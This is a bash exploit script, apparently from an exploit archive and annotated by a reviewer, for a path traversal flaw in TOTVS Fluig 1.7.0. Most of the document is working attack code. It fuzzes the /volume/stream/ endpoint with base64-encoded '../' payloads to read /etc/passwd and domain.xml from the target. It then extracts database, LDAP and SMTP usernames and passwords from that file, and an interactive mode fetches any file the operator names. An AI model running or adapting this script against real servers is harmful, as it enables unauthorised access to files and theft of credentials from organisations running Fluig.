# Exploit Title: Fluig 1.7.0 - Path Traversal
# Date: 26/11/2020
# Exploit Author: Lucas Souza
# Vendor Homepage: https://www.totvs.com/fluig/
# Version: <== 1.7.0-210217
# Tested on: 1.7.0-201124
#!/bin/bash
# NOTE(review): this shebang sits on line 7, after the header comments, so the
# kernel never sees it; the script runs under bash only when started as
# `bash script.sh`. It does depend on bash (uses [[ ]], $[ ] and echo -e).
# Positional arguments: $1 = target base URL, $2 = number of ids to probe.
# Both are used unquoted later on, so they are word-split and glob-expanded.
url="$1"
npayload=$2
# Truncate ./payload.txt (created empty if it does not exist).
> payload.txt
# Downloads a banner file from a third-party GitHub raw URL into ./banner on
# every start. The fetch is silent (-s) and its exit status is never checked,
# so an offline run simply continues with an empty or stale ./banner.
curl -s https://raw.githubusercontent.com/lucxssouza/banners/main/xFluig/banner > banner
# -- FUNCTIONS --
# create-payload: rewrites ./wordlist.txt with one probe line per id.
# For every id from 1 to $npayload it emits four query strings, all of the
# form "?t=1&vol=Default&id=<n>&ver=1000&file=<traversal path>": two aimed at
# Windows locations and two at Linux locations. The file is consumed by wfuzz
# in enum/manual-mode, which base64-encodes each line into the URL path.
# Globals read: npayload. Globals written: count (not declared local).
# Output: ./wordlist.txt (truncated first).
function create-payload {
> wordlist.txt
count=1
# $npayload is unquoted and never validated as an integer. enum falls back to
# 25 when it is empty (see the npayload check there); manual-mode's "target"
# branch does not guarantee a value.
while [[ $count -le $npayload ]]; do
# WINDOWS PAYLOAD
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../users/public/desktop/desktop.ini" >> wordlist.txt
# LINUX PAYLOAD
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../etc/passwd" >> wordlist.txt
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
# $[ ] is the deprecated bash arithmetic form; same result as $((count + 1)).
count=$[$count + 1]
done
}
# manual-mode: interactive prompt loop. Never returns; the only exits are
# Ctrl-C/EOF handling by the shell. Recognised commands are "info", "clear",
# "target"; anything else is treated as a file path to request from the
# target through the same /volume/stream/ endpoint used by enum.
# Globals read: url, param, mdr, XmlPayload (all set elsewhere, mostly in
# enum; when manual-mode is entered before a successful enum run, param and
# mdr are empty and the paths below degrade to "report//<name>").
# Globals written: url, XmlPayload, path, mkfile, DirPath, pwd.
function manual-mode {
while :; do
echo
echo -e "\033[0;31m[!] VALID MANUAL MODE COMMANDS\033[0m"
echo
echo -e "\033[0;32m -[ clear - Clear Screen\033[0m"
echo -e "\033[0;32m -[ target - Set a target\033[0m"
echo -e "\033[0;32m -[ director/file - Ex: /etc/passwd\033[0m"
echo -e "\033[0;32m -[ info - Target info and parse 'domain.xml' file ( require target )\033[0m"
echo
echo -n -e "\033[0;31mMANUAL MODE >>\033[0m "; read -r input2
# Normalise the typed text: backslashes -> slashes, then lower-case.
# `echo $input2` is unquoted, so the input is word-split and glob-expanded
# before sed sees it.
path=$(echo $input2 | sed 's/\\/\//g' | tr '[:upper:]' '[:lower:]')
# Derive a flat report filename: slashes -> dashes, first dash dropped
# (so "/etc/passwd" becomes "etc-passwd"). Used unquoted as a path below.
mkfile=$(echo $path | sed 's/\//-/g' | sed 's/-//' | tr '[:upper:]' '[:lower:]')
if [[ $path == 'info' ]]; then
clear
cat banner
# domain-xml ends by calling manual-mode again, so each "info" nests a new
# prompt loop inside this one rather than returning here.
domain-xml
elif [[ $path == 'clear' ]]; then
clear
elif [[ $path == 'target' ]]; then
XmlPayload=''
echo
echo -n -e "\033[0;31mINSERT TARGET >> \033[0m"; read url
# NOTE(review): no variable name follows `read -i`; bash treats "npayload"
# as readline prefill text and stores the typed value in REPLY, so
# $npayload is not changed by this prompt.
echo -n -e "\033[0;31mWORDLIST SIZE >> \033[0m"; read -i npayload
enum
else
echo
# Single-entry wordlist: the query prefix recovered by enum ($param) plus a
# fixed traversal prefix and the user-supplied path.
echo "$param../../../../../../../../../../../../..$path" > wordlist.txt
# wfuzz base64-encodes the wordlist line into the URL path and keeps only
# HTTP 200 responses (--sc 200); the pipeline extracts the quoted FUZZ
# value from wfuzz's output. Note `cut -d':' -f2` here versus `-f3` in the
# two wfuzz pipelines in enum; which field is right depends on wfuzz's
# output format and is not verifiable from this file.
# Server-side this appears as a GET to /volume/stream/Rmx1aWc=/<base64>,
# where the base64 decodes to a query string containing "file=../".
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f2 | grep 200 | cut -d'"' -f2 > payload.txt
DirPath=$(head -1 payload.txt)
if [[ $DirPath == '' ]]; then
echo
echo -e ' \033[0;33m[!] COMMAND OR DIRECTORY/FILE NOT FOUND - TYPE HELP\033[0m'
else
# Re-fetch the hit and save the body under report/<host>/<mkfile>.
# $url, $DirPath, $mdr and $mkfile are all unquoted here.
curl -s $url/volume/stream/Rmx1aWc=/$DirPath > report/$mdr/$mkfile
echo
echo -e '\033[0;31m'$path'\033[0m'
echo
cat report/$mdr/$mkfile
echo
pwd=$(pwd)
echo
echo -e '\033[0;33m'[!] FILE SAVE IN, $pwd/report/$mdr/$mkfile'\033[0m'
fi
fi
done
}
# domain-xml: prints a summary of a previously saved report/<host>/domain.xml
# (written by enum) and hands control back to manual-mode. It does not fetch
# anything from the target except the Server response header.
# Globals read: mdr, url, XmlPayload. Globals written: domain.
# The sed pipelines below strip all blanks, select one XML element by name and
# replace the tags with coloured labels. The `\o033` escapes in the sed
# replacements are GNU sed octal syntax and are not portable to BSD sed.
# Every pipeline also deletes "${env.FLUIG_*:" and "}", which suggests the
# file uses "${env.NAME:fallback}" style values; what gets printed is the text
# left between those markers, presumably the inline fallback value — confirm
# against a real domain.xml.
function domain-xml {
# `ls | grep` presence test; when $mdr is empty this lists report/ itself.
domain=$(ls report/$mdr | grep domain.xml)
if [[ $domain == '' ]]; then
echo
echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'
else
echo
echo -e ' \033[0;32m | TOTVS FLUIG - [+] XML ANALISYS\033[0m'
echo
echo -e ' \033[0;33m[!] INFORMATION\033[0m'
echo
# HEAD request to the target base URL; only the Server header is shown.
curl -s -I $url | grep Server
echo
echo -e '\033[0;31mTarget\033[0m'
echo $url
echo
echo -e '\033[0;31mPayload plaintext\033[0m'
# XmlPayload is the base64 path segment enum found; empty if manual-mode
# reset it via "target".
echo $XmlPayload | base64 -d
echo
echo
echo -e '\033[0;31mPayload base64 encoded\033[0m'
echo $XmlPayload
echo
echo -e ' \033[0;31m[!] DATABASE CONNECTIONS FOUNDS\033[0m'
echo
# <connection-url> elements.
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep connection-url | sed 's/<connection-url>/\o033[0;31mDB CONNECT >> \o033[0m/g' | sed 's/<\/connection-url>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_URL://g' | sed 's/}//g'
echo
echo -e ' \033[0;31m[!] USERS/PASSWORDS FOUNDS\033[0m'
echo
# <user-name> and <password> elements (the latter matched as "password>" so
# that attributes named password elsewhere are not picked up here).
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep user-name | sed 's/<user-name>/ \o033[0;31mUSER >> \o033[0m/g' | sed 's/<\/user-name>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_DATABASE_USER://g' | sed 's/}//g'
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep password'>' | sed 's/<password>/\o033[0;31m PASSWORD >> \o033[0m/g' | sed 's/<\/password>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_PASSWORD://g' | sed 's/}//g'
echo
echo -e ' \033[0;31m[!] LDAP INTEGRATIONS\033[0m'
echo
# <module-option> entries: provider URL, base DN, bind principal, credentials.
# The patterns assume the blank-stripped form `<module-optionname="..."value="..."/>`.
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep ldap:// | sed 's/<module-optionname="java.naming.provider.url"value="/\o033[0;31mDOMAIN SERVER >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep baseCtxDN | sed 's/<module-optionname="baseCtxDN"value="/\o033[0;31mDISTINGUISHED NAME >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.principal | sed 's/<module-optionname="java.naming.security.principal"value="/\o033[0;31mUSER ADMIN >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.credentials | sed 's/<module-optionname="java.naming.security.credentials"value="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
echo
echo -e ' \033[0;31m[!] SMTP SETTINGS\033[0m'
echo
# <remote-destination host=.../> and <smtp-server .../> entries.
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep remote-destination | sed 's/<remote-destinationhost="/\o033[0;31mSMTP ADDRESS >> \o033[0m/g' | sed 's/\/>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_SMTP_HOST://g' | sed 's/${env.FLUIG_HOST_ADDRESS://g' | sed 's/${env.FLUIG_SMTP_PORT//g'| sed 's/}//g'
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep smtp-server | sed 's/<smtp-serveroutbound-socket-binding-ref="mail-smtp"//g' | sed 's/\/>//g' | sed 's/password="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"username="/\o033[0;31m USER >> \o033[0m/g' | sed 's/}//g' | sed 's/${env.FLUIG_SMTP_USERNAME://g' | sed 's/${env.FLUIG_SMTP_PASSWORD://g'
echo
# Re-enters the prompt loop instead of returning to the caller (which is
# itself manual-mode), so the call depth grows by one per "info" command.
manual-mode
fi
}
# enum: the automated run. Builds the wordlist, sends it through wfuzz, and on
# a hit tries the two domain.xml locations, saves the result under
# report/<host>/domain.xml and drops into manual-mode. Never returns: every
# branch ends in manual-mode, which loops forever.
# Globals read: url, npayload. Globals written: mdr, npayload, payload, param,
# XmlPayload.
# Observable on the target as bursts of GET requests to
# /volume/stream/Rmx1aWc=/<base64>, where "Rmx1aWc=" is base64 of "Fluig" and
# the trailing segment decodes to a query string containing "file=../".
function enum {
# Report directory name: the URL with "https://" / "http://" and the first
# remaining "/" removed. The value comes straight from user input and is
# used unquoted in paths below.
mdr=$(echo $url | sed 's/https:\/\///' | sed 's/http:\/\///' | sed 's/\///')
# Created before the empty-url check, so an empty $url still creates report/.
mkdir -p report/$mdr
if [[ $url == '' ]]; then
clear
cat banner
echo -e ' \033[0;31m-[ Usage Ex1: ./xfluig.sh FLUIG_ADDRESS REQUESTS_WFUZZ\033[0m'
echo -e ' \033[0;31m-[ Ex2: ./xfluig.sh FLUIG_ADDRESS:PORT REQUESTS_WFUZZ\033[0m'
echo -e ' \033[0;31m-[ ( ./xfluig.sh fluig.host.com:8080 1000 )\033[0m'
manual-mode
elif [[ $npayload == '' ]]; then
# Default number of ids when $2 was not given.
npayload=25
clear
cat banner
echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'
echo
echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'
echo
create-payload
else
clear
cat banner
echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'
echo
echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'
create-payload
fi
echo
echo -e '\033[0;31m[>>] RUNNING WFUZZ - WAIT\033[0m'
echo
# First pass: every wordlist line, base64-encoded into the path; only HTTP
# 200 responses are kept and the quoted FUZZ value is extracted (field 3 of
# the colon-split line, unlike manual-mode which uses field 2).
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
payload=$(head -1 payload.txt)
if [[ $payload == '' ]]; then
clear
cat banner
echo -e ' \033[0;32m | TOTVS FLUIG - PATH ENUMERATION AND XML ANALISYS \033[0m'
echo
echo -e '\033[0;33m[!] DIRECTORY/FILE NOT FOUND OR TARGET NOT VULNERABLE\033[0m'
echo
manual-mode
else
# Recover the query prefix of the successful line: decode it and keep
# everything before the first "." (i.e. up to and including "file=").
# manual-mode reuses $param for every later request.
param=$(echo $payload | base64 -d | cut -d '.' -f1)
clear
cat banner
echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'
echo
echo -e ' \033[0;33m[!] VULNERABLE\033[0m'
echo
echo -e '\033[0;31m[>>] SEARCHING DOMAIN.XML FILE\033[0m'
# Second pass: a two-line wordlist for the two domain.xml locations.
echo "$param../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" > wordlist.txt
echo "$param../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
clear
cat banner
echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'
echo
echo -e ' \033[0;33m[!] VULNERABLE\033[0m'
echo
# HEAD request; only the Server header is printed.
curl -s -I $url | grep Server
echo
echo -e '\033[0;31mTarget\033[0m'
echo $url
echo
echo -e '\033[0;31mPayload plaintext\033[0m'
echo $payload | base64 -d
echo
echo
echo -e '\033[0;31mPayload base64 encoded\033[0m'
echo $payload
echo
fi
# Note: when the first pass found nothing, manual-mode above does not
# return, so this point is reached only after the second pass ran.
XmlPayload=$(head -1 payload.txt)
if [[ $XmlPayload == '' ]]; then
echo
echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'
manual-mode
else
# Save the fetched domain.xml with all blanks stripped; domain-xml's sed
# patterns rely on that blank-free form. $url, $XmlPayload and $mdr are
# unquoted.
curl -s $url/volume/stream/Rmx1aWc=/$XmlPayload | sed 's/[[:blank:]]//g' > report/$mdr/domain.xml
echo
echo -e '\033[0;33m[!] DOMAIN.XML FILE FOUND - TYPE "INFO" TO PARSE\033[0m'
manual-mode
fi
}
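# Entry point: run the automated pass with the positional arguments captured
# at the top of the file. (The original line was fused with the page's
# "Data" heading from the site chrome that follows; restored to the call.)
enum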